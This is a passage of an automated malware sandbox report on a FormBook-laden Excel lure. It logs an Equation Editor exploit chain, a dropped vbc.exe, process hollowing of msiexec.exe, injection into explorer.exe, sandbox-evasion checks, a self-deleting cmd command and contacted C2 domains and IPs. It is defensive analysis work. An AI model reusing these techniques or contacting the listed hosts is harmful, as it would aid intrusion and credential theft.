            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00760C40 NtGetContextThread,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FC48 NtSetInformationFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_026600C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_026607AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02660060 NtQuerySection,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02660078 NtResumeThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02660048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_026610D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02661148 NtOpenThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0266010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_026601D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FAD0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FAB8 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02661930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265F938 NtWriteFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02660C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0265FD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_02661D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E8720 NtClose,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E85EA NtCreateFile,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_00B96A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_00B96F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
            Source: Cielert.tmp.4.dr | Static PE information: No import functions for PE file found
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Cielert.tmp 8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
            Source: Joe Sandbox View | Dropped File: C:\Users\Public\vbc.exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: Cielert.tmp.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Cielert.tmp.4.dr | Static PE information: Section .text
            Source: RFQ_Order_PO_TAE5203E.xlsx | Virustotal: Detection: 35%
            Source: RFQ_Order_PO_TAE5203E.xlsx | ReversingLabs: Detection: 34%
            Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB36.tmp
            Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/15@3/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00436274 FindResourceA,LoadResource,LockResource,
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004258C0 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0044F951 push ecx; iretd
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00425CA0 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B832 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B83B push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004160CB push edx; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8D6 push ebp; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8F3 push ebp; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B89C push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C134 push ebp; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00407265 push cs; iretd
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004152C7 push edx; retf
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041537D push ebp; retf
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C5DD push ebp; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415F76 push ds; iretd
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B7E5 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408783 push ecx; iretd
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_0266DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E60CB push edx; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000D7265 push cs; iretd
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E52C7 push edx; retf
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E537D push ebp; retf
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000D8783 push ecx; iretd
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000EB7E5 push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000EB83B push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000EB832 push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000EB89C push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000EB8D6 push ebp; ret
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_000E5F76 push ds; iretd
            Source: hnmy[1].exe.2.dr | Static PE information: section name: .bdata
            Source: vbc.exe.2.dr | Static PE information: section name: .bdata
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,
            Source: initial sample | Static PE information: section name: .text entropy: 7.32148562524
            Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\Cielert.tmp
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Hooking and other Techniques for Hiding and Protection:

            Found hidden mapped module (file has been removed from disk)
            Source: C:\Users\Public\vbc.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CIELERT.TMP
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042F0F0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041B3B0 IsIconic,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042F8A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041DCC2 IsIconic,GetWindowPlacement,GetWindowRect,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848 | Thread sleep time: -240000s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exe | API coverage: 4.7 %
            Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
            Source: explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.549935611.000000000456F000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.546753465.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000006.00000000.550067017.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004465D8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004465E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00446608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004466A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00446978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00441E58 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_007726F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_026726F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B50 LdrLoadDll,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A3B6 SetUnhandledExceptionFilter,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A3C8 SetUnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Network Connect: 163.197.71.43 80
            Source: C:\Windows\explorer.exe | Domain query: www.mediafyagency.com
            Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
            Source: C:\Windows\explorer.exe | Domain query: www.aloebiotics.com
            Source: C:\Windows\explorer.exe | Domain query: www.sjljtzsls.com
            Sample uses process hollowing technique
            Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: CA0000
            Maps a DLL or memory area into another process
            Source: C:\Users\Public\vbc.exe | Section loaded: C:\Users\user\AppData\Local\Temp\Cielert.tmp target: C:\Users\Public\vbc.exe protection: readonly
            Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A855 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043B3F9 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API (1) | DLL Side-Loading (1) | Process Injection (512) | Masquerading (111) | Input Capture (1) | System Time Discovery (1) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (2) | LSASS Memory | Security Software Discovery (221) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Exploitation for Client Execution (13) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (512) | Security Account Manager | Virtualization/Sandbox Evasion (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (122) | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information (4) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
